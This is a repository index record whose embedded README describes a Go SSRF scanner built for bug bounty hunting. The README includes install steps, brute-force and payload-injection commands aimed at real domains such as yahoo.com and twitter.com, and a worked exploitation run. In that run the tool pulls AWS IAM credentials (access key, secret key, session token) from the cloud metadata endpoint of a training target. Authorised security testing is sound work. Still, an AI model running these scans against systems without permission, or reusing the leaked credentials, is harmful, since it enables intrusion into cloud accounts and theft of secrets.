{"id":13842413,"url":"https://github.com/R0X4R/ssrf-tool","last_synced_at":"2025-07-11T15:31:09.942Z","repository":{"id":57565398,"uuid":"337436169","full_name":"R0X4R/ssrf-tool","owner":"R0X4R","description":"An SSRF detector tool written in golang. I have fixed some errors and added some more payloads to it. But the tool credits go to z0idsec.","archived":true,"fork":false,"pushed_at":"2021-02-10T03:44:01.000Z","size":466,"stargazers_count":43,"open_issues_count":4,"forks_count":11,"subscribers_count":3,"default_branch":"main","last_synced_at":"2024-11-21T13:35:22.527Z","etag":null,"topics":["bugbounty","bugbounty-tool","bugbountytips","go","ssrf","ssrf-tool","tools"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/R0X4R.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-02-09T14:45:51.000Z","updated_at":"2024-08-28T11:00:38.000Z","dependencies_parsed_at":"2022-09-03T12:20:57.363Z","dependency_job_id":null,"html_url":"https://github.com/R0X4R/ssrf-tool","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/R0X4R/ssrf-tool","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2Fssrf-tool","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2Fssrf-tool/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2Fssrf-tool/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2Fssrf-tool/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/R0X4R","download_url":"https://codeload.github.com/R0X4R/ssrf-tool/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R0X4R%2Fssrf-tool/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264840522,"owners_count":23671685,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","bugbounty-tool","bugbountytips","go","ssrf","ssrf-tool","tools"],"created_at":"2024-08-04T17:01:34.048Z","updated_at":"2025-07-11T15:31:09.618Z","avatar_url":"https://github.com/R0X4R.png","language":"Go","funding_links":[],"categories":["Go"],"sub_categories":[],"readme":"# SSRF Detector Tool\n\nA SSRF detector tool written in golang. I have fixed some errors and added some more payloads into it. But the tool credits goes to [z0idsec](https://twitter.com/z0idsec).\n\n### Upcoming Features\n- Fetch endpoints from Javascript files ✅ \n- Bruteforce parameters ✅ \n- Find SSRF in those parameters ✅ \n- Match multiple patterns in the response ✅ \n- Check Post Request ❌\n- Check Headers ❌\n\n### Features\n- Wordlist Creation\n- Inject in every parameter one by one\n- Very fast speed\n- Inject into paths\n- Silent Mode\n- Fetch endpoints from Javascript files \n- Bruteforce parameters  \n- Find SSRF in those parameters \n- Match multiple patterns in the response\n\n### Note\n\nMake sure when creating wordlists or finding ssrf with my tool that the domains are resolved.\nYou can use:\n- [httpx](https://github.com/projectdiscovery/httpx)\n- [httprobe](https://github.com/tomnomnom/httprobe)\n- [massdns](https://github.com/blechschmidt/massdns)\n\nTo do so. Also, Make sure to customerise your patterns file for greater results.\n\n+ **Installation**\n    \n    ```sh\n    git clone https://github.com/R0X4R/ssrf-tool.git\n    cd ssrf-tool\n    go build ssrftool.go \u0026\u0026 mv ssrftool /usr/bin/\n    ```\n    You can also download the precompiled binary file [binary](https://github.com/R0X4R/ssrf-tool/releases)\n    \n+ **Usage**\n\n    ```sh\n    █▀ █▀ █▀█ █▀▀\n    ▄█ ▄█ █▀▄ █▀░\n\n        v1.2 - @z0idsec (fixed by @R0X4R)\n\n    [WRN] Use with caution. You are responsible for your actions\n    [WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\n    Usage of ./ssrftool:\n    -append\n            Append the payload to the parameter\n    -brute\n            Brute force parameters against endpoints to find SSRF\n    -concurrency int\n            Set the concurrency for greater speeds (default 30)\n    -domains string\n            The list of subdomains\n    -gen\n            Generate a SSRF wordlist to be used\n    -parameters string\n            The parameters list\n    -paths\n            (true or false) for testing paths or parameters\n    -pattern string\n            Match the response with a pattern (e.g.) 'Success:'\n    -patterns string\n            Match the response with a list of patterns\n    -payloads string\n            The payloads list\n    -silent\n            silent output\n    ```\n  \n    **Payloads and patterns files:** [https://github.com/R0X4R/ssrf-tool/tree/main/important](https://github.com/R0X4R/ssrf-tool/tree/main/important)\n    \n    **Exploitation**\n    \n    ```sh\n    end@root:~$ ./ssrftool -domains domains -paths=true -payloads payloads.txt -patterns patterns.txt\n\n\n    █▀ █▀ █▀█ █▀▀\n    ▄█ ▄█ █▀▄ █▀░\n\n        v1.2 - @z0idsec (fixed by @R0X4R)\n\n    [WRN] Use with caution. You are responsible for your actions\n    [WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\n    \u003e  Testing  http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy//169.254.169.254/latest/meta-data/iam/security-credentials/flaws/\n    {\n      \"Code\" : \"Success\",\n      \"LastUpdated\" : \"2021-02-10T03:03:06Z\",\n      \"Type\" : \"AWS-HMAC\",\n      \"AccessKeyId\" : \"ASIA6GG7PSQGZ6OYP77X\",\n      \"SecretAccessKey\" : \"48Qe7eyMwWzPz8FiwtH+RQIaDtZPZf1DVCEiMia9\",\n      \"Token\" : \"IQoJb3JpZ2luX2VjEKP//////////wEaCXVzLXdlc3QtMiJHMEUCIBnoKbpbPT/h7JXCay5G1ErKcTpB7xQNx07pz84Y18GBAiEAwAlKQPsog/ESCNoXGY1RMyJgJlK2Rq7gNoYjpVPxuAYqvQMInP//////////ARABGgw5NzU0MjYyNjIwMjkiDG1GDv5XTUNfbXAlJSqRAzFe/7GMnB9DakVDBXSbYfyOKtFiC1TG6wmgGZREXpvwveF2Yt9fjFE/NohaaZQP5HPJo/pXHRlVzIQ41I5RbacDhzsACvS5VJwU1mjAteQY/TRkL+5qHYhM0bjDo1pqRCDvRuBmd5uC0OExkQCu55K4uo8qetjYYdfJ5pgPK2hKUyWYfHxwHa2JPNsst3L6oeRp8bzDk3DNipsFan9S0Umz/rfP1rRziUfKKRDBPyzx0wpjtFdC5yjV+O1UMLZ2Qn1ANmp/Otr3UhYu2ssdR/a9a+kE6pi0Qmi/JKfz/6ovIafXm8/a6gisIqEHZ02TrserNdccwqcbNP7mRCFFJzjp93bJkK30xLa7LMOkY4HSYoFyyPSOibAK5XX/mnlxKxQvK2r+mvvelUglEGe9m59Dp+OhYrhFXTvABNy64AnrvsJRA06D5o0nZECL39JuEYfUj1gKHYjL7iS5GfmPqGhIx9zzpC6UB0veh3UQhCqMz0GxqfHoYa+jfei2hYbe/QJVrme0OwGxz8l1qmumF7ohML+ZjYEGOusBlnslmeGXBJN/sGYhqCXXKzyX6oBmW5avOgp8ztsMTPMVICgA4nTep1ZN/q9hyB7CkdZ1GjWoHCCfd+MqxEEszxVawtrMFZSmx82OlfIfB13JQr95Ezk0FhrPu2TsARWUQTPWpXtu9kMFr36CHUqBCQ2agZhhoYk6brjz9I4d0gz4Qj1rY/ZB69rYGALRgty8cTJLGcwJ5CRddoeaiodBsroui19w5NyC3S3oRHP49rYAY8cYqCGGvTvwtbk1H6+p+dkC22wBlMsY/uwdGr6hnaVHYCc3Pr1ewIj/9iuYloEJOHweJy7uRl8dSA==\",\n      \"Expiration\" : \"2021-02-10T09:26:50Z\"\n    }\n    VULNERABLE: http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy//169.254.169.254/latest/meta-data/iam/security-credentials/flaws/\n    ```\n\n\n+ **Find SSRF in paths with Subfinder, httpx**\n\n    ```sh\n    subfinder -d yahoo.com -silent | httpx -silent \u003e\u003e domains | ssrf-tool -domains domains -payloads ssrf.txt -silent=false -paths=true -patterns patterns.txt\n    ```\n\n+ **Wordlist Creation**\n\n    ```sh\n    echo \"https://www.twitter.com\" | getJS -complete | ssrf-tool -gen=true\n    ```\n\n    Can be used with other tools like subfinder \u0026 amass\n\n+ **BruteForce For SSRF**\n\n    ```sh\n    echo \"https://www.twitter.com\" | getJS -complete | anew domains | ssrftool -domains domains -silent=false -brute=true -gen=true -patterns patterns.txt  -parameters params.txt\n    ```\n\n+ **Testing The Paths**\n\n    ```sh\n    ssrftool -domains domains -silent=false -patterns patterns.txt -paths=true  -brute=false -payloads ssrf.txt\n    ```\n\n+ **Testing Parameters with waybackurls**\n\n    ```sh\n    echo \"twitter.com\" | waybackurls \u003e\u003e domains; ssrftool -domains domains -silent=false -paths=false -payloads ssrf.txt\n    ```\n\n**Credits:** \n[@z0idsec](https://twitter.com/z0idsec)    [@ethicalhackingplayground](https://github.com/ethicalhackingplayground/)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FR0X4R%2Fssrf-tool","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FR0X4R%2Fssrf-tool","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FR0X4R%2Fssrf-tool/lists"}